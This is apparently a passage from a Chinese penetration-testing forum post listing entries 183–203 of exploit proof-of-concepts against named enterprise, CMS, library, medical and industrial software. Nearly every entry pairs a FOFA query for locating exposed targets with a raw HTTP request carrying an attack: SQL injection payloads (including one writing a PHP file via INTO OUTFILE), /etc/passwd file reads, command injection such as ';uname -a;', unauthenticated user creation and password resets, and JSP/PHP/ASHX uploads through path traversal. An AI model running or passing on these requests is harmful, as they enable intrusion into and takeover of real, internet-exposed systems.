Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.9
Connection: close
Content-Type: application/x-www-form-urlencoded

username=test1234&pwd=test1234&savedays=1

183. 广州图创图书馆集群管理系统 updOpuserPw SQL injection
FOFA:body="interlib/common/" || body="Interlib图书馆集群管理系统" || body="/interlib3/system_index" || body="打开Interlib主界面"
GET /interlib3/service/sysop/updOpuserPw?loginid=admin11&newpassword=Aa@123456&token=1%27and+ctxsys.drithsx.sn(1,(select%20111111*111111%20from%20dual))=%272 HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Linux; Android 11; motorola edge 20 fusion) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.61 Mobile Safari/537.36
Accept-Charset: utf-8
Accept-Encoding: gzip, deflate
Connection: close

184. 迅饶科技 X2Modbus gateway AddUser arbitrary user creation
FOFA:server="SunFull-Webs"
POST /soap/AddUser HTTP/1.1
Host: your-ip
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:125.0) Gecko/20100101 Firefox/125.0
Accept: application/xml, text/xml, */*; q=0.01
Content-Type: text/xml; charset=utf-8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
X-Requested-With: XMLHttpRequest

insert into userid (USERNAME,PASSWORD,PURVIEW,LOGINDATE,LOGINTIME) values('root','123456','4','2024-5-6','11:7:56')

185. 瑞友天翼应用虚拟化系统 SQL injection
version < 7.0.5.1
FOFA:app="REALOR-天翼应用虚拟化系统"
GET /index.php?s=/Admin/appsave&appid=3%27%29%3Bselect+unhex%28%273c3f706870206563686f206d643528223122293b202466696c65203d205f5f46494c455f5f3b20756e6c696e6b282466696c65293b%27%29+into+outfile+%27.%5C%5C..%5C%5C..%5C%5CWebRoot%5C%5Cplom.xgi%27%23 HTTP/1.1
Host: host

186. F-logic DataCube3 SQL injection
CVE-2024-31750
F-logic DataCube3 is a compact terminal measurement system for photovoltaic power generation systems.
FOFA:title=="DataCube3"
POST /admin/pr_monitor/getting_index_data.php HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:124.0) Gecko/20100101 Firefox/124.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close
Content-Type: application/x-www-form-urlencoded

req_id=1) AND 1113=LIKE(CHAR(65,66,67,68,69,70,71),UPPER(HEX(RANDOMBLOB(500000000/2)))) AND (1450=1450

187. Mura CMS processAsyncObject SQL injection
CVE-2024-32640
FOFA:"Mura CMS"
POST /index.cfm/_api/json/v1/default/?method=processAsyncObject HTTP/1.1
Host: your-ip
Content-Type: application/x-www-form-urlencoded

object=displayregion&contenthistid=x%5c' AND (SELECT 3504 FROM (SELECT(SLEEP(5)))MQYa)-- Arrv&previewid=1

188. 叁体-佳会视频会议 attachment arbitrary file read
version <= 3.9.7
FOFA:body="/system/get_rtc_user_defined_info?site_id"
GET /attachment?file=/etc/passwd HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8
Connection: close

189. 蓝网科技临床浏览系统 deleteStudy SQL injection
FOFA:app="LANWON-临床浏览系统"
GET /xds/deleteStudy.php?documentUniqueId=1%27;WAITFOR%20DELAY%20%270:0:5%27-- HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close


190. 短视频矩阵营销系统 poihuoqu arbitrary file read
FOFA:title=="短视频矩阵营销系统"
POST /index.php/admin/Userinfo/poihuoqu HTTP/2
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.54 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9

poi=file:///etc/passwd


191. 亿赛通电子文档安全管理系统 NavigationAjax SQL injection
FOFA:body="/CDGServer3/index.jsp"
POST /CDGServer3/js/../NavigationAjax HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Content-Type: application/x-www-form-urlencoded

command=nav&id=1'waitfor delay '0:0:5'--+&name=&openId=


192. 富通天下外贸ERP UploadEmailAttr arbitrary file upload
FOFA:title="用户登录_富通天下外贸ERP"
POST /JoinfApp/EMail/UploadEmailAttr?name=.ashx HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36(KHTML, like Gecko) Chrome/93.0.4577.63 Safari/537.36
Content-Type: application/x-www-form-urlencoded

<% @ webhandler language="C#" class="AverageHandler" %>
using System;
using System.Web;
public class AverageHandler : IHttpHandler
{
public bool IsReusable
{ get { return true; } }
public void ProcessRequest(HttpContext ctx)
{
ctx.Response.Write("test");
}
}


193. 山石网科云鉴安全管理系统 setsystemtimeaction command execution
FOFA:body="山石云鉴主机安全管理系统"
GET /master/ajaxActions/getTokenAction.php HTTP/1.1
Host:
Cookie: PHPSESSID=2333333333333;
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0


POST /master/ajaxActions/setSystemTimeAction.php?token_csrf={{token}} HTTP/1.1
Host:
User-Agent: Mozilla/5.0
Accept-Encoding: gzip, deflate
Accept: */*
Connection: close
Cookie: PHPSESSID=2333333333333;
Content-Type: application/x-www-form-urlencoded
Content-Length: 84

param=os.system('echo 23333333333456 > /opt/var/majorsec/installation/master/runtime/img/config')


GET /master/img/config HTTP/1.1
Host:
User-Agent: Mozilla/5.0


194. 飞企互联-FE企业运营管理平台 uploadAttachmentServlet arbitrary file upload
FOFA:app="FE-协作平台"
If a request to /servlet/uploadAttachmentServlet returns a response, the vulnerability is present.

POST /servlet/uploadAttachmentServlet HTTP/1.1
Host: host
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryKNt0t4vBe8cX9rZk

------WebKitFormBoundaryKNt0t4vBe8cX9rZk
Content-Disposition: form-data; name="uploadFile"; filename="../../../../../jboss/web/fe.war/hello.jsp"
Content-Type: text/plain

<% out.println("hello");%>
------WebKitFormBoundaryKNt0t4vBe8cX9rZk
Content-Disposition: form-data; name="json"

{"iq":{"query":{"UpdateType":"mail"}}}
------WebKitFormBoundaryKNt0t4vBe8cX9rZk--


195. 飞鱼星上网行为管理系统 send_order.cgi command execution
FOFA:title=="飞鱼星企业级智能上网行为管理系统"
POST /send_order.cgi?parameter=operation HTTP/1.1
Host: 127.0.0.1
Pragma: no-cache
Cache-Control: no-cache
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36
Accept: */*
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 68

{"opid":"777777777777777777","name":";uname -a;echo ","type":"rest"}


196. 河南省风速科技统一认证平台 password reset
FOFA:body="/cas/themes/zbvc/js/jquery.min.js"
POST /cas/userCtl/resetPasswordBySuper HTTP/1.1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/93.0.4577.63 Safari/537.36
Content-Type: application/json;charset=UTF-8
X-Requested-With: XMLHttpRequest
Host:
Accept: text/html, image/gif, image/jpeg, *; q=.2, */*; q=.2
Content-Length: 45
Connection: close

{"xgh":"test","newPass":"test666","email":""}


197. 浙大恩特客户资源管理系统 Quotegask_editAction SQL injection
FOFA:app="浙大恩特客户资源管理系统"
GET /entsoft/Quotegask_editAction.entweb;.js?goonumStr=1')+UNION+ALL+SELECT+111*111--+&method=goonumIsExist HTTP/1.1
Host:
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2656.18 Safari/537.36
Accept-Encoding: gzip, deflate
Connection: close


198. 阿里云盘 WebDAV command injection
CVE-2024-29640
GET /cgi-bin/luci/admin/services/aliyundrive-webdav/query?sid=%60%6c%73%20%2f%3e%2f%77%77%77%2f%61%61%61%2e%74%78%74%60%20 HTTP/1.1
Cookie: sysauth=41273cb2cffef0bb5d0653592624cf64;
Accept: */*
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8,en-GB;q=0.7,en-US;q=0.6
Connection: close


199. cockpit system assetsmanager_upload endpoint file upload
FOFA:title="Authenticate Please!"

1. Run the PoC to retrieve the CSRF token, then obtain the cookie, then upload and access the result:
GET /auth/login?to=/ HTTP/1.1

Response: 200, returned value: csfr:"eyJ0eXAi0iJKV1QiLCJhbGci0iJIUsI1NiJ9.eyJjc2ZyIjoibG9naW4ifQ.6KvuRJo3-Dp2UouwGH9D8cmnXEL4NGNen9CX3ex86cw"

2. Use the JWT obtained in the previous step to obtain the cookie:

POST /auth/check HTTP/1.1
Content-Type: application/json

{"auth":{"user":"admin","password":"admin"},"csfr":"eyJ0eXAi0iJKV1QiLCJhbGci0iJIUsI1NiJ9.eyJjc2ZyIjoibG9naW4ifQ.6KvuRJo3-Dp2UouwGH9D8cmnXEL4NGNen9CX3ex86cw"}

Response: 200, returned value:
Set-Cookie:mysession=95524f01e238bf51bb60d77ede3bea92: path=/

3. Upload using the cookie obtained above:
POST /assetsmanager/upload HTTP/1.1
Content-Type: multipart/form-data; boundary=---------------------------36D28FBc36bd6feE7Fb3
Cookie: mysession=95524f01e238bf51bb60d77ede3bea92

-----------------------------36D28FBc36bd6feE7Fb3
Content-Disposition: form-data; name="files[]"; filename="tttt.php"
Content-Type: text/php

<?php echo "tttt";unlink(__FILE__);?>
-----------------------------36D28FBc36bd6feE7Fb3
Content-Disposition: form-data; name="folder"

-----------------------------36D28FBc36bd6feE7Fb3--


/storage/uploads/tttt.php

200. SeaCMS 海洋影视管理系统 dmku SQL injection
FOFA:app="海洋CMS"
GET /js/player/dmplayer/dmku/?ac=del&id=(select(0)from(select(sleep(5)))v)&type=list HTTP/1.1
Cookie: PHPSESSID=hlfl5flck9q3ng1blehhv86s4s
Upgrade-Insecure-Requests: 1
Cache-Control: max-age=0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9


201. 方正全媒体新闻采编系统 binary SQL injection
FOFA:body="/newsedit/newsedit/" || app="FOUNDER-全媒体采编系统"
POST /newsedit/newsplan/task/binary.do HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close

TableName=DOM_IMAGE+where+REFID%3D-1+union+select+%271%27%3B+WAITFOR+DELAY+%270%3A0%3A5%27%3Bselect+DOM_IMAGE+from+IMG_LARGE_PATH&FieldName=IMG_LARGE_PATH&KeyName=REFID&KeyID=1


202. 微擎系统 AccountEdit arbitrary file upload
FOFA:body="/Widgets/WidgetCollection/"
Obtain the __VIEWSTATE and __EVENTVALIDATION values:
GET /User/AccountEdit.aspx HTTP/1.1
Host: 滑板人之家
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/531.36 (KHTML, like Gecko) Chrome/83.0.4103.112 Safari/537.31
Content-Length: 0


Replace the __VIEWSTATE and __EVENTVALIDATION values below with the retrieved ones:
POST /User/AccountEdit.aspx HTTP/1.1
Accept-Encoding: gzip, deflate, br
Content-Type: multipart/form-data;boundary=---------------------------786435874t38587593865736587346567358735687

-----------------------------786435874t38587593865736587346567358735687
Content-Disposition: form-data; name="__VIEWSTATE"

__VIEWSTATE
-----------------------------786435874t38587593865736587346567358735687
Content-Disposition: form-data; name="__EVENTVALIDATION"

__EVENTVALIDATION
-----------------------------786435874t38587593865736587346567358735687
Content-Disposition: form-data; name="ctl00$MyContentPlaceHolder$ctl00$upload"; filename="1123.txt"
Content-Type: text/plain

Hello World!
-----------------------------786435874t38587593865736587346567358735687
Content-Disposition: form-data; name="ctl00$MyContentPlaceHolder$ctl00$bttnUpload"

上传图片
-----------------------------786435874t38587593865736587346567358735687
Content-Disposition: form-data; name="ctl00$MyContentPlaceHolder$ctl00$txtLastName"


-----------------------------786435874t38587593865736587346567358735687
Content-Disposition: form-data; name="ctl00$MyContentPlaceHolder$ctl00$txtEmail"


-----------------------------786435874t38587593865736587346567358735687--


/_data/Uploads/1123.txt

203. 红海云EHR PtFjk file upload
FOFA:body="RedseaPlatform"
POST /RedseaPlatform/PtFjk.mob?method=upload HTTP/1.1
Host: x.x.x.x
Accept-Encoding: gzip
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryt7WbDl1tXogoZys4
Content-Length: 210

------WebKitFormBoundaryt7WbDl1tXogoZys4
Content-Disposition: form-data; name="fj_file"; filename="11.jsp"
Content-Type: image/jpeg

<% out.print("hello,eHR");%>
------WebKitFormBoundaryt7WbDl1tXogoZys4--

Welcome to 中国网络渗透测试联盟 (https://www.cobjon.com/) Powered by Discuz! X3.2